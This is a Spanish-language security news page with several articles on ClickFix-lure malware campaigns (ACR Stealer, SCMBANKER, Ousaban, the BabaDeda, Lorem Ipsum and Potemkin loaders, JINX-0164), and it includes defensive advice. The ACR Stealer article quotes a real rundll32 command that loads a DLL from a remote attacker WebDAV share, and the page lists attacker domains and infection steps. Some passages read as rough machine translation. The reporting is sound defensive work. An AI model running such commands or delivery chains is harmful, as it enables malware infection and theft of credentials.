ACR Stealer utiliza señuelos ClickFix para robar tokens del navegador y archivos de Microsoft 365 – CYBERDEFENSA.MX

ACR Stealer, un ladrón de información en circulación desde 2024, está saliendo de las redes empresariales con contraseñas de navegador guardadas, tokens de sesión en vivo, archivos PDF, documentos de Microsoft 365 y archivos de carpetas sincronizadas de OneDrive y SharePoint.

Entra porque alguien pegó un comando en un cuadro Ejecutar y presionó Enter. microsoft establecido dos de las cadenas de entrega el jueves. Su equipo Defender Experts, el brazo de detección administrado de la compañía, había observado el aumento de la actividad de ACR Stealer en los entornos de los clientes desde finales de abril hasta mediados de junio, y dice que las campañas están «utilizando con éxito señuelos ClickFix para robar credenciales de navegador, tokens de autenticación y documentos confidenciales».

Ambas cadenas se abren con el mismo mensaje y luego se dividen: una deja rastros en el disco, la otra se ejecuta casi por completo en la memoria. La guía de remediación de Microsoft les dice a las víctimas que revoquen los tokens, no solo que roten las contraseñas.

Una carga útil en los píxeles

El mensaje probablemente llegue a través de publicidad maliciosa o resultados de búsqueda manipulados por SEO, según el informe. La cadena sin archivos comienza cuando se genera el comando pegado mshta.exe para extraer contenido HTA remoto. Un cargador de VBScript integrado se apoya en objetos COM para decodificar y activar PowerShell; esa etapa genera una identificación de víctima, deshabilita la validación de certificados y ejecuta lo que recupera en la memoria.

Lo que recupera es un JPEG de un servidor de imágenes, con la carga útil en los píxeles. Las rutinas personalizadas lo crean, lo descifran, lo descomprimen y lo ejecutan de manera reflexiva. Luego va por Chrome y Edge, leyendo el Login Data y Web Data bases de datos e invocar DPAPI para descifrar las contraseñas, cookies y tokens que contienen. Los archivos PDF en el escritorio y en Descargas también van.

El 26 de mayo, Brad Duncan, responsable del SANS Internet Storm Center documentó una infección de Windows rastreó hasta una página que se hacía pasar por Claude, el asistente de inteligencia artificial de Anthropic, a la que se accedía a través de anuncios maliciosos de Google y que a menudo se escondía detrás sites.google.com URL. La página ofrecía instrucciones de macOS cuando se abría en una Mac y instrucciones de Windows cuando se abría en Windows.

Ciberseguridad

Microsoft nunca nombra el señuelo. Dos de los indicadores de su tabla de la Campaña 2, creativecommunityinfo[.]art y enhanceblabber[.]ccfiguran como host de carga útil y C2. The Hacker News comparó ambos con la cadena de Duncan, que recorría los subdominios de cada uno siete semanas antes, y el informe de Microsoft cita su diario entre las referencias.

Esa cadena también sacó un JPEG de 628 KB de ImgBB, un servicio de alojamiento de imágenes. Lo marcó como parte de la infección y no obtuvo nada: «tampoco pude encontrar ningún signo evidente de datos incrustados».

canario rojo había registrado señuelos de la marca Claude un mes antes, entregando ACR Stealer a través de páginas falsas de Claude Code en GitLab, como claude-desktop[.]gitlab[.]io.

La otra cadena deja huellas

La primera cadena de Microsoft escribe en el disco, lo que deja a los defensores más con qué trabajar. El comando pegado extrae una DLL directamente de un recurso compartido WebDAV a través de HTTPS, utilizando un directorio GUID y un nombre de archivo creado para pasar como otra cosa; el ejemplo del informe es google.ct.

Red Canary publicó la misma forma en su informe de mayo, a partir de la telemetría de abril, semanas antes del artículo de Microsoft:

"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

Dos de las tres variantes que Defender Experts vio utilizar pushd Primero debe montar el recurso compartido remoto como una unidad local temporal, de modo que la carga útil se ejecute a través de lo que parece una ruta local. El más sigiloso envuelve eso en conhost.exe --headless para cerrar la ventana de la consola y oculta las cadenas para pushd, rundll32y el host remoto detrás de la expansión retrasada de las variables de entorno.

Lo que sigue es PowerShell ofuscado. Coloca un ZIP en una carpeta debajo %LocalAppData%\Temp con un nombre inofensivo; El ejemplo de Microsoft es LogiOptionsPlus. un paquete pythonw.exe luego inicia el script Python, por lo que no aparece nada en la pantalla. El instalador borra las copias más antiguas antes de realizar la instalación, lo que lo convierte en un actualizador.

Persiste a través de una tarea programada oculta que se hace pasar por una actualización de software, copia marcas de tiempo notepad.exe en sus propios archivos y borra el historial de PowerShell detrás de él. La última etapa permanece en la memoria y se ejecuta a través de la API de Windows Fiber.

En un subconjunto de estas intrusiones, un segundo cargador de Python se comunica con los puntos finales RPC públicos de blockchain y la infraestructura de nodos Web3, probablemente extrayendo una carga útil o una dirección C2 de un libro de contabilidad público. Microsoft llama a la técnica EtherHiding: coloque el puntero en un contrato inteligente y no quedará ningún solucionador controlado por el atacante que aprovechar.

Sin errores, sin números

Ninguna cadena explota una vulnerabilidad. Ambos heredan exactamente lo que el usuario que inició sesión ya tiene, y cada capa posterior, el montaje WebDAV, la extracción de píxeles y la transferencia en memoria, solo se ejecuta porque una persona leyó un mensaje y presionó Enter. No hay CVE en esta historia. La aplicación de parches no elimina la ruta de pegar y ejecutar.

Microsoft dice que los señuelos están funcionando, pero nunca lo cuantifica. El informe no proporciona un recuento de víctimas, ni un número de clientes afectados, ni una base de referencia para el aumento que informa.

La telemetría de abril de Red Canary al menos tiene números. ClearFake, un clúster de inyección web que ha estado alimentando a ACR Stealer desde al menos marzo de 2025, ocupó el puesto número uno en su lista de amenazas más frecuentes por primera vez ese mes, y ACR Stealer entró entre los diez primeros empatando en el sexto lugar.

Ciberseguridad

El clúster se entrega a través de JavaScript inyectado en sitios comprometidos y el informe de Microsoft no lo menciona en ninguna de las cadenas.

¿De quién es este ladrón?

Microsoft tiene cuidado con lo que afirma. Vincula la actividad con ACR Stealer según el comportamiento observado y el arte posterior a la explotación, se compara con lo que se sabe públicamente sobre la infraestructura de la familia y no nombra ningún actor de amenaza. La precaución se gana.

ACR, también escrito como AcridRain, fue comercializado en foros de habla rusa por un actor conocido como SheldIO, que cerró las ventas en julio de 2024. Las cuentas se dividieron sobre lo que sucedió después. eSentire dice que el código fuente se vendió. El relato de Proofpoint difiere: el mismo canal de Telegram anunció el cierre, no un adiós del equipo, y el panel de Amatera apareció cinco meses después.

En cuanto al cambio de marca, están de acuerdo. Punto de prueba reportado en junio de 2025 que «ACR Stealer fue significativamente actualizado y renombrado como Amatera Stealer», con un precio de $199 por mes a $1,499 por año. Red Canary trata a ACR y Amatera como una familia y evalúa al propio ACR como un GrMsk Stealer actualizado.

Una detección de julio de 2026 denominada ACR Stealer es una llamada de comportamiento en una base de código cuyo nombre ha cambiado al menos una vez y puede haber cambiado de propietario. La etiqueta describe el código. No te dice quién lo dirige.

donde detenerlo

Un control se encuentra antes de cada técnica anterior: ninguna cadena se ejecuta sin que un usuario pegue un comando en el cuadro de diálogo Ejecutar.

  • Corta el vector. eSentire recomienda eliminar el mensaje Ejecutar a través de GPO y bloquear mshta.exe a través de AppLocker o WDAC.
  • Utilice reglas de control de aplicaciones y reducción de la superficie de ataque para que PowerShell, Python, mshta.exey rundll32.exe no puede iniciar contenido entregado por Internet desde Downloads, Tempo %LocalAppData%.
  • Caza rundll32.exe ejecutándose sin parámetros de línea de comando mientras se establece una conexión de red, que es la oportunidad de detección de Red Canary para esta familia. Agregue tareas programadas que se hacen pasar por actualizaciones de software, tiempos de espera y borrado del historial de PowerShell.
  • En un host sospechoso, aísle, rote credenciales, revoque tokens y verifique las conexiones salientes a recursos compartidos remotos y servicios de alojamiento de imágenes.

Microsoft envió tres consultas de búsqueda de Defender XDR y 16 dominios de campaña con el informe.

Esos indicadores son una porción, y el informe así lo dice: representativos, no el rango completo de la familia, con más campañas e infraestructura probablemente activas. Los dominios rotan. La pregunta en el frente no, porque funciona. Los señuelos se superponen en lugar de reemplazarse: Red Canary vio CAPTCHA falsos y páginas de Claude falsas en la misma telemetría de abril.

El malware SCMBANKER utiliza señuelos ClickFix para atacar a los usuarios de la banca mexicana – CYBERDEFENSA.MX

Una nueva operación bancaria fraudulenta está dirigida a clientes de bancos, fintech, procesadores de pagos e intercambios de criptomonedas mexicanos que utilizan señuelos ClickFix.

El grupo de actividades, rastreado por Elastic Security Labs bajo el nombre REF6045implica infectar a las víctimas a través de páginas de verificación CAPTCHA falsas que las engañan para que ejecuten un comando malicioso que instala un kit de herramientas PowerShell denominado SCMBANKER. Algunos componentes del malware se remontan a octubre de 2025.

«Una vez instalado, el operador puede ver cuándo una víctima abre una sesión bancaria, bloquear la pantalla detrás de una advertencia bancaria falsa, empujar a las víctimas a una interacción telefónica en vivo, redirigir el navegador o reemplazar los números de cuenta copiados en el portapapeles», afirman los investigadores de seguridad Jia Yu Chan y Salim Bitam. dicho. «Para una adquisición total, también pueden implementar una herramienta comercial de acceso remoto».

SCMBANKER está diseñado específicamente para atacar el ecosistema financiero de México, y la evidencia apunta al uso de un modelo de lenguaje grande (LLM) para desarrollar una gran parte de las herramientas. El kit de herramientas admite una amplia gama de capacidades, que incluyen monitoreo de sesiones bancarias, captura de pantalla, superposiciones de vishing, redireccionamientos de phishing, manipulación del portapapeles e instalación de utilidades remotas.

Los hallazgos de Elastic surgen de una falla de seguridad operativa en la infraestructura REF6045, que hizo posible recuperar un archivo ZIP que contiene el directorio raíz web completo de la operación desde un directorio abierto ubicado en «68.211.161[.]46.»

Ciberseguridad

El punto de partida es una verificación CAPTCHA falsa que se disfraza como una página de verificación de seguridad, instando a las víctimas potenciales a resolver un desafío similar a Google reCAPTCHA para identificar imágenes que contienen una boca de incendio. Una vez que se completa el paso, se les presentan instrucciones para copiar y pegar un comando malicioso en el cuadro de diálogo Ejecutar de Windows.

Esto, a su vez, desencadena la ejecución de un script por lotes que es responsable de instalar el malware a través de un proceso de varias etapas, comenzando con una pantalla de actualización de Windows falsa.

«El script por lotes inicia inmediatamente Microsoft Edge en modo quiosco y apunta a una actualización falsa[.]net, un conocido sitio de pentesting/red team que muestra una pantalla falsa de Windows Update», dijo Elastic. «Esta distracción gana tiempo para que el script se ejecute completamente».

En la siguiente etapa, el script verifica si se está ejecutando como administrador y, si no, inicia un mensaje de Control de cuentas de usuario (UAC) de Windows cada 20 segundos, empujando efectivamente a la víctima a hacer clic en «Sí» en el cuadro de diálogo de consentimiento. Tan pronto como obtiene privilegios elevados, bloquea el movimiento del mouse. Este comportamiento, combinado con la pantalla falsa de actualización de Windows, obliga a la víctima a quedarse, dándole al malware tiempo suficiente para descargar el conjunto completo de herramientas en segundo plano utilizando el administrador de bits herramienta desde el mismo directorio.

Después de descargar los componentes de SCMBANKER en el host comprometido, configura la persistencia usando la carpeta de Inicio de Windows y una clave de Ejecución del Registro, después de lo cual envía mediante programación un evento de pulsación de tecla F11 para salir de la pantalla completa e inicia una secuencia de pulsación de tecla «Ctrl+W» para cerrar la pestaña falsa de actualización de Windows.

«Sin embargo, este enfoque sólo funciona en una ventana de navegador estándar de pantalla completa, no en modo quiosco», dijo Elastic. «Luego fuerza un reinicio con el comando de apagado /r /t 02 y cambia. Al reiniciar, el mecanismo de persistencia anterior a través de la tecla Ejecutar del Registro activa la ejecución del archivo VBScript (‘run.vbs’)».

El script de Visual Basic sirve como iniciador maestro para ejecutar varios módulos en paralelo:

  • edifhjwe.ps1, para actualización automática del kit de herramientas
  • cliente.ps1, para baliza de comando y control (C2) y control de implantes
  • avs.ps1, para descargar el instalador RAT de Remote Utilities para facilitar el acceso práctico a la máquina de la víctima
  • clip.ps1 y clip2.ps1, para número de cuenta CLABE y número de tarjeta, secuestro del portapapeles para redirigir transacciones
  • correr.ps1, para ejecución arbitraria de PowerShell
  • ini.ps1, un iniciador de «jujuzkt.ps1», un monitor de actividad bancaria que comprueba todos los títulos de ventanas visibles cada segundo en busca de coincidencias contra una lista de instituciones financieras mexicanas y, si se encuentra una coincidencia, toma capturas de pantalla y registra las pulsaciones de teclas
  • rotor2.ps1, un contenedor para «mensaje1.ps1», un motor de vishing que ofrece superposiciones falsas con advertencias de seguridad que indican a las víctimas que llamen a ciertos números de teléfono.
  • remo.ps1, un iniciador controlado por dirección IP para «jujuzkt2.ps1», un redirector de navegador que coincide con los títulos de las ventanas contra una listay, si hay una URL configurada, coloca una URL de phishing en el portapapeles, crea el navegador y envía una serie de eventos de pulsación de teclas (Ctrl+L, Ctrl+V e Intro) para llevar a la víctima a la página de inicio de phishing.

Uno de esos destinos de redireccionamiento, «’bancaporinternetbbmx[.]online», contiene un script de notificación de Telegram de carga de página que recopila detalles del navegador, del dispositivo y de la dirección IP, y envía la información a un chat de Telegram, alertando al operador que una víctima redirigida ha alcanzado el atractivo para ataques posteriores.

Ciberseguridad

«Los guiones muestran fuertes signos de ayuda de la IA, muy probablemente al generar un modelo de lenguaje grande en español y luego aplicar ofuscación manual», dijo Elastic.

«El código tiene una personalidad dividida, con nombres de funciones limpios y descriptivos y comentarios explicativos intensos junto a variables acortadas a mano y artefactos de generación sobrantes. La ubicación de comentarios similares a instrucciones directamente encima del código que describen sugiere que los autores han solicitado un asistente de codificación en línea como Copilot o Cursor».

En conjunto, los hallazgos representan el trabajo de un actor de amenazas que se ha apoyado en la IA para ensamblar un tosco conjunto de herramientas que se caracteriza mejor por copiar y pegar archivos por lotes, mala artesanía y fallas de seguridad operativa.

«Las víctimas se mantienen como una fuente pasiva mientras el operador observa un panel en vivo y ataca solo a los objetivos que valen la pena, activando redireccionamientos del navegador, bloqueos de vishing, intercambios de portapapeles o un RAT completo por IP, a pedido», concluyeron los investigadores. «Por más crudo que sea, SCMBANKER ya tiene víctimas reales. El contador de víctimas en vivo y las máquinas etiquetadas en los paneles del propio operador muestran que personas individuales están siendo atacadas activamente».

El troyano bancario Ousaban ataca a los usuarios de bancos ibéricos con señuelos PDF falsos – CYBERDEFENSA.MX

Un troyano bancario brasileño llamado Ousaban va tras los usuarios de Windows que realizan operaciones bancarias en España y Portugal. Laboratorios FortiGuard de Fortinet identificó la campaña en mayo de 2026.

Se abre con un PDF de phishing disfrazado de archivo corrupto, comprueba que el visitante se encuentra realmente en España o Portugal y oculta su carga útil real dentro de una imagen.

El objetivo es el habitual: robar inicios de sesión bancarios y hacerse cargo de cuentas.

Ousaban se sienta tranquilamente en una PC con Windows y espera a que el usuario abra un sitio bancario. Cuando se carga un banco objetivo, puede capturar capturas de pantalla y pulsaciones de teclas, alterar el portapapeles, mostrar mensajes falsos y darle control remoto al atacante.

Juntas, esas son las herramientas para secuestrar una sesión bancaria en vivo y apoderarse de una cuenta. Ousaban vigila a más de dos docenas de bancos en los dos países, entre ellos Banco Santander, BBVA, CaixaBank, Bankinter y Caixa Geral de Depósitos.

Cómo funciona el ataque

Comienza con un PDF de phishing disfrazado de archivo corrupto. El PDF muestra un mensaje que le indica a la víctima que presione el botón «Actualizar», lo que abre una página web maliciosa.

El JavaScript oculto en el PDF puede abrir la misma página por sí solo. La página se hace pasar por un portal de instaladores y documentos fiscales mientras examina a los visitantes. Fortinet dice que una versión anterior ejecutó estas comprobaciones en el navegador: analizó la dirección IP, el idioma y la zona horaria del visitante, bloqueó a cualquiera que ingresara a través de una VPN y filtró las herramientas de seguridad automatizadas verificando detalles como el tamaño de la pantalla y las fuentes instaladas.

Ciberseguridad

La versión actual traslada esa detección al servidor del operador, por lo que las reglas exactas están ocultas. De cualquier manera, los visitantes fuera de España o Portugal reciben un aviso de «acceso denegado» en español en lugar de malware.

Borre la marca y comenzará la descarga. Un script descarga una imagen que parece un ícono de PDF pero oculta un archivo ZIP en su interior, un truco llamado esteganografía. El script descomprime Ousaban de ese ZIP, lo ejecuta y luego elimina la imagen, el ZIP y a sí mismo para dejar menos contenido. Una vez que se ejecuta, Ousaban agrega una entrada de registro llamada Financeiro (en portugués, «finanzas») para que se inicie con Windows.

El servidor de mando de Ousaban, la máquina que lo controla, es deliberadamente difícil de encontrar. Lleva un enlace Pastebin que apunta a una dirección de servidor, pero Fortinet dice que esa dirección es un señuelo.

Ocultar estos detalles en los servicios web es una vieja costumbre de Ousaban: campañas anteriores ocultaban la configuración en Google Docs. Esta vez, el servidor real se mueve todos los días. El malware lee la fecha actual de una página de Google, crea una dirección web a partir de esa fecha más un secreto fijo y la busca. Bloquear la dirección de ayer no sirve de nada.

Un libro de jugadas brasileño familiar

Nada de esto es nuevo. Ousaban, también identificado como Javali, forma parte de un grupo de troyanos bancarios brasileños que Kaspersky denominó hace años como el «Tetrade» junto a Grandoreiro, Guildma y Melcoz.

Estas familias comenzaron en Brasil y avanzaron hacia España y Portugal, tomando prestados códigos unos de otros a medida que avanzaban; El cifrado de cadenas de Ousaban es el mismo esquema personalizado utilizado por otra familia, Casbaneiro.

Grandoreiro, el más conocido del grupo, demuestra lo duradero que es el libro de jugadas. Sobrevivió a un Derribo coordinado por Interpol en enero de 2024 y regresó en unos meses, y sus cargadores se apoyaron en el mismo hábito de ocultar las descargas detrás de señuelos con apariencia de PDF y verificaciones de países.

Ciberseguridad

Sigue activo contra objetivos ibéricos, y este año se informó de una campaña que siguió afectando a los bancos portugueses. Fortinet vincula la misma infraestructura a la actividad de Ousaban a finales de 2025 que utilizó otros puntos de entrada, incluido «ClickFix», una estafa que hace que la víctima pegue un comando malicioso mientras piensa que está solucionando un error.

que hacer

El primer lugar para atraparlo es el señuelo. Trate cualquier PDF o correo electrónico que afirme que un archivo está dañado y le indique que presione «Actualizar» como hostil. Lo mismo ocurre con las indicaciones que indican a los usuarios que peguen un comando para corregir un «error». El PDF puede incluso abrir la página maliciosa por sí solo.

Trate los adjuntos inesperados de facturas, facturas o documentos fiscales como sospechosos, especialmente en España y Portugal.

La evaluación del lado del servidor significa que una zona de pruebas automatizada que simplemente recupera el enlace puede obtener solo la página de error en español en lugar del malware. La detonación de la puerta de enlace por sí sola puede evitarlo. La campaña sólo afecta a Windows.

El informe de Fortinet enumera dominios, direcciones IP y hashes de archivos para bloquear. Los defensores deben estar atentos a la clave Ejecutar del registro de Financeiro y a los archivos colocados en C:\SysMain_5874288. Fortinet dice que su antivirus FortiGuard marca las muestras y su producto FortiMail marca los correos electrónicos de phishing.

El troyano en sí es antiguo y Fortinet dice que su cifrado personalizado se ha mantenido eficaz contra la detección durante años. La parte más nueva es el envoltorio: geofencing, una carga útil oculta y una dirección diaria desechable, todo creado para mostrar el malware a víctimas reales en dos países y a nadie más.

Las campañas de ClickFix amplían la entrega de malware con nuevos cargadores y señuelos de actualización falsos – CYBERDEFENSA.MX

Los investigadores de ciberseguridad han señalado múltiples campañas de ClickFix que ofrecen tres cargadores de malware llamados Cargador BabaDeda, Cargador Lorem Ipsumy Potemkinsegún informes independientes de Morfisec, AzulVoyanty Cazadorarespectivamente.

Los ataques que involucran a BabaDeda Loader, observados en abril de 2026, se han dirigido a organizaciones educativas y financieras.

«La actividad anterior de BabaDeda era conocida por ocultar cargas útiles maliciosas dentro de paquetes de instalación que parecían legítimos», dijo el investigador de Morphisec Shmuel Uzan. «Este nuevo marco mantiene el mismo genoma de código pero lo expande a un cargador mucho más capaz creado para el sigilo, la evasión y la flexibilidad de carga útil».

El punto de partida de los ataques es un ataque de ingeniería social ClickFix que engaña a los usuarios para que ejecuten comandos PowerShell proporcionados por el atacante para entregar el cargador, que luego se utiliza para eliminar ladrones de información y troyanos de acceso remoto (RAT) mediante la combinación de técnicas bien conocidas como PowerShell oculto, shellcode en memoria, carga lateral de DLL y almacenamiento de carga útil externo.

La actividad se ha atribuido a BabaDeda, un servicio de cifrado que Morphisec documentó por primera vez en noviembre de 2021 en relación con una campaña dirigida a los sectores de criptomonedas y Web3 para distribuir ladrones de información, RAT y ransomware LockBit.

El cargador está diseñado para perfilar el host, evitar su ejecución en sistemas rusos o bielorrusos y realizar comprobaciones relacionadas con el producto de seguridad antes de recuperar la carga útil principal e inyectarla en un proceso confiable de Windows como «svchost.exe».

Ciberseguridad

Una de las familias de malware entregadas a través de BabaDeda Loader es una puerta trasera .NET y un ladrón de información que puede recopilar datos confidenciales y establecer un canal cifrado hacia un servidor de comando y control (C2). El malware admite una amplia gama de funciones, que incluyen:

  • Recopilar información detallada del sistema
  • Descubrir perfiles de navegador instalados
  • Extracción de artefactos del navegador, como cookies, historial de navegación, credenciales guardadas, preferencias y claves de cifrado de estado local.
  • Recorrer directorios y seleccionar archivos según reglas configurables
  • Lectura y extracción de contenidos de archivos.
  • Realizar capturas de pantalla y mostrar información
  • Ejecutar comandos de shell o procesos externos y recopilar resultados
  • Transferir datos nuevamente al servidor C2
  • Uso de API nativas de Windows para interacción de procesos, operaciones de memoria, acceso DPAPI, comportamiento del Administrador de reinicio y acceso avanzado a archivos

Una segunda cadena de ataque arroja un archivo ZIP que emplea carga lateral de DLL para iniciar DanaBot y SectopRAT (también conocido como ArechClient). Lo notable de estos ataques es el uso de un componente de carga por etapas denominado Storage Crypter que lee el material de carga de archivos externos similares a archivos de almacenamiento como «List.Control.dat».

«El paquete de aplicación visible parece legítimo, mientras que las cargas maliciosas permanecen ocultas dentro de contenedores almacenados externamente y se decodifican sólo momentos antes de su ejecución», dijo Morphisec. «Este diseño minimiza la visibilidad forense, complica el análisis automatizado y reduce las oportunidades para que las herramientas de seguridad tradicionales identifiquen actividad maliciosa antes de que ocurra la ejecución».

Los hallazgos representan una evolución de los marcos de carga modernos, que se han vuelto cada vez más modulares y separan la entrega, el almacenamiento, la ejecución y la implementación de carga útil en distintos componentes en lugar de depender de una única entidad monolítica.

ClickFix Caídas de Cadena Cargador Lorem Ipsum

La técnica Click Fix también se ha observado en una campaña activa que utiliza al menos cinco sitios de WordPress comprometidos como punto de partida para ofrecer un cargador incipiente y una puerta trasera con el nombre en código Lorem Ipsum Loader. Los sitios web pirateados abarcan múltiples sectores, incluidos la arquitectura, los servicios legales y la tecnología de la construcción.

Los ataques marcan un alejamiento de campañas oportunistas anteriores que empleaba instaladores troyanizados de Microsoft Teams a través de portales de descarga falsos promovidos mediante envenenamiento de SEO y publicidad maliciosa. Se cree que el cargador está activo en estado salvaje desde febrero de 2026.

«El giro hacia los señuelos ClickFix alojados en sitios comprometidos de WordPress (WP) amplía significativamente el grupo de víctimas potenciales y demuestra la voluntad de los operadores de adaptar rápidamente sus técnicas de acceso inicial», dijeron los investigadores de BlueVoyant, Thomas Elkins y Joshua Green.

El cambio en el mecanismo de entrega se ha atribuido a la reciente interrupción por parte de Microsoft de Fox Tempest (también conocido como Forging Marauder), un actor de amenazas que anunciaba una operación de firma de malware como servicio (MSaaS) para ayudar a entregar malware sin generar ninguna señal de alerta utilizando certificados de Microsoft Trusted Signing firmados fraudulentamente.

«La pérdida del suministro de certificados hizo inviable el modelo de entrega del instalador previamente firmado, lo que obligó a los operadores a adoptar un mecanismo de entrega que elimina por completo la firma del código», agregaron los investigadores.

El grupo de actividades de amenazas es el ejemplo más reciente de cómo los actores malintencionados pueden recuperarse fácilmente y adaptarse a modelos de entrega alternativos a pesar de los continuos esfuerzos de los defensores y las fuerzas del orden para desmantelar sus operaciones.

El ecosistema de Lorem Ipsum se ha atribuido con gran confianza a un actor de amenazas motivado financieramente conocido como Vanilla Tempest (también conocido como Rapid Brigantine, Vice Society y Vice Spider), que es conocido para implementar familias de ransomware como Rhysida, BlackCat, Zeppelin y Quantum Locker.

Las secuencias de ataque que distribuyen Lorem Ipsum Loader utilizan señuelos de actualización de seguridad del navegador web Edge estilo ClickFix para ejecutar un comando malicioso que descarga un archivo ZIP y una versión desactualizada de Node.js lanzada en 2017 (versión 7.10.1) para ejecutar cargas útiles basadas en JavaScript presentes en el archivo y al mismo tiempo minimizar las posibilidades de detección.

La carga útil de JavaScript funciona como un cuentagotas para implementar y ejecutar componentes de malware adicionales en el sistema infectado, incluido un script por lotes que configura la persistencia al iniciar una cadena de carga lateral de DLL para ejecutar una DLL maliciosa («mscoree.dll» o «msvcp140.dll»), que, a su vez, decodifica la carga útil incorporada de Lorem Ipsum Loader.

«Lorem Ipsum Loader está diseñado para recuperar la puerta trasera Lorem Ipsum de la siguiente etapa de la infraestructura C2 obtenida de perfiles controlados por atacantes alojados en plataformas de redes sociales», dijo BlueVoyant, agregando que la puerta trasera contiene funcionalidad para ejecutar cargas útiles de la siguiente etapa recibidas del servidor C2.

«La cadena Lorem Ipsum culmina con la transferencia a las herramientas establecidas de post-explotación de Rapid Brigantine y, en última instancia, a sus implementaciones documentadas de ransomware, principalmente Rhysida».

Potemkin, RMMProject y EtherRAT entregados a través de ClickFix

La tercera campaña que se basa en ClickFix es una cadena de ataque sofisticada que instala un paquete MSI, que luego suelta un cargador previamente indocumentado con nombre en código Potemkin a través de una carga útil de aplicación HTML (HTA). El cargador sirve como conducto para EtherRAT y RMMProject, una DLL programable en Lua con módulos para permitir el control remoto de la pantalla y el robo de credenciales del navegador al sortear las protecciones de cifrado vinculado a aplicaciones (ABE) de Chromium.

RMMProject también implementa un mecanismo de distribución de tareas para ejecutar un archivo o proceso, tomar capturas de pantalla, desviar datos de autocompletar del navegador, ejecutar scripts Lua arbitrarios, finalizar procesos del navegador y descargar y ejecutar un módulo adicional desde una URL en tiempo de ejecución.

El cargador Potemkin es un «cargador x64 personalizado que utiliza un algoritmo de generación de dominio para encontrar su C2 y carga de manera reflexiva los módulos siguientes en la memoria», dijeron los investigadores de Huntress Anna Pham y Zach Rogers. La actividad fue detectada por el proveedor de seguridad el mes pasado.

El cargador admite varios componentes funcionalmente distintos para manejar el ciclo de vida general, descubrimiento de C2 impulsado por DGA mediante un diccionario integrado de 1000 palabras, identificación de víctimas mediante un valor UUID único escrito en «%LOCALAPPDATA%\hyper-v.ver», sondeo de tareas, recuperación y ejecución de DLL y un cifrado de bytes personalizado para proteger la comunicación C2 y el diccionario DGA.

Ciberseguridad

Con el acceso establecido, se dice que el actor de amenazas desconocido participó en una actividad práctica con el teclado para configurar las exclusiones de Microsoft Defender, implementar túneles SOCKS inversos de Chisel, realizar reconocimientos adicionales, configurar un túnel de Cloudflare para acceso persistente y propagarse lateralmente a través de WMIExec y SMBExec para llegar al controlador de dominio y propagar EtherRAT a través de más de 11 hosts.

ClickFix sigue siendo una técnica duradera

Los descubrimientos se producen mientras ClickFix sigue siendo un método eficaz para atacar a los usuarios de Windows y macOS con pantallas de verificación de bots fraudulentas para entregar cargas útiles maliciosas como Ladrón de fexiaun ladrón de información de macOS y HellsUcheckeruna puerta trasera entregada a través de ÉterOcultar que es capaz de ejecutar archivos recuperados de C2 e informar los resultados.

Las campañas ClickFix también capitalizado sobre el creciente interés en torno a las herramientas de inteligencia artificial (IA) para distribuir instaladores MSI falsos para que Claude ejecute cargas útiles de PowerShell.

«ClickFix sigue siendo eficaz por una simple razón: explota la naturaleza humana. Las personas siguen naturalmente las instrucciones cuando se les presenta una instrucción clara y de apariencia autorizada (‘presione Win+R, pegue esto, presione Enter’)», dijeron los investigadores de Huntress. «La ingeniería social no necesita ser sofisticada; sólo necesita parecer un paso legítimo para solucionar problemas, y la mayoría de las veces, eso es suficiente».

El riesgo que representa pegar comandos en la aplicación Terminal desde sitios web (o agentes de chat, o aplicaciones de mensajería o correo electrónico) ha llevado a Apple a introducir una nueva ventana emergente de seguridad en macOS Tahoe 26.4 que advierte a los usuarios de Mac que intentan hacerlo.

«Los estafadores utilizan estos canales para instruir a las personas a pegar comandos maliciosos en la Terminal para dañar su Mac o comprometer su privacidad», Apple notas en un documento de soporte publicado esta semana. «Esta alerta ayuda a garantizar que no lo engañen para que ejecute un comando que no esperaba».

JINX-0164 apunta a empresas de criptomonedas con señuelos de reclutamiento falsos y malware para macOS – CYBERDEFENSA.MX

Una nueva campaña orquestada por un actor de amenazas previamente indocumentado se ha dirigido a organizaciones de criptomonedas con el objetivo de facilitar el robo de activos digitales mediante ingeniería social con temática de reclutamiento y malware macOS personalizado.

«Estas campañas aprovecharon sofisticadas técnicas de ingeniería social, malware personalizado para macOS y una focalización profunda en la infraestructura CI/CD», afirman los investigadores de Wiz Shira Ayal, Eden Abergil, Andre Maccarone, Yuval Dan y Benjamin Read. dicho. «Los métodos utilizados permitieron al actor de amenazas pasar lateralmente de las computadoras portátiles de los empleados comprometidas a los sistemas de distribución de códigos y la infraestructura de desarrollo».

La empresa de seguridad en la nube propiedad de Google está rastreando la actividad bajo el nombre JINX-0164. Se considera que el actor de amenazas está activo desde al menos mediados de 2025 y está motivado por ganancias financieras, apuntando a los desarrolladores a través de técnicas de reclutamiento y otras técnicas de ingeniería social para desviar criptomonedas. En al menos un caso, se dice que el adversario llevó a cabo un ataque a la cadena de suministro.

En la cadena de ataque documentada por Wiz, se descubrió que JINX-0164 aprovecha perfiles creíbles de LinkedIn para acercarse a las víctimas y ofrecer una reunión virtual. La invitación a la reunión está diseñada para dirigir al objetivo a un dominio fraudulento que se hace pasar por un proveedor de teleconferencias.

Ciberseguridad

A partir de ahí, se engaña a las víctimas para que descarguen e instalen el programa. Esto, a su vez, activa la recuperación de un ladrón de información de macOS basado en Python y un troyano de acceso remoto con nombre en código AUDIOFIX utilizando un script bash alojado en un dominio de tienda de controladores falso («apple.driver-store[.]com»).

«El [bash] El script descargó una carga útil compatible con la arquitectura del mismo dominio, compatible con los sistemas Intel y Apple Silicon. La carga útil se hace pasar por un controlador de audio del sistema llamado coreaudiod, se guardó como ChromeUpdater y se ejecutó a través de launchctl», dijo Wiz.

Luego, el malware Python se aprovecha para robar datos confidenciales del punto final comprometido, moverse lateralmente a sistemas de distribución de código interno e infraestructura de desarrollo inyectando la carga útil AUDIOFIX y modificar el código fuente en un intento de comprometer otros puntos finales y robar credenciales de billetera de criptomonedas.

Los datos capturados incluyen credenciales de administradores de contraseñas, navegadores web y archivos de llavero de iCloud; credenciales de administrador local; claves SSH; archivos de configuración; archivos de historial de la consola; información de extensiones del navegador de criptomonedas; direcciones de billeteras de criptomonedas; y sesiones activas de Discord, Slack y Telegram.

Además del robo de información, AUDIOFIX admite varios comandos que permiten el reconocimiento manual, la exfiltración, la ejecución arbitraria de comandos de shell, la eliminación de archivos y la recuperación de carga útil desde un servidor externo.

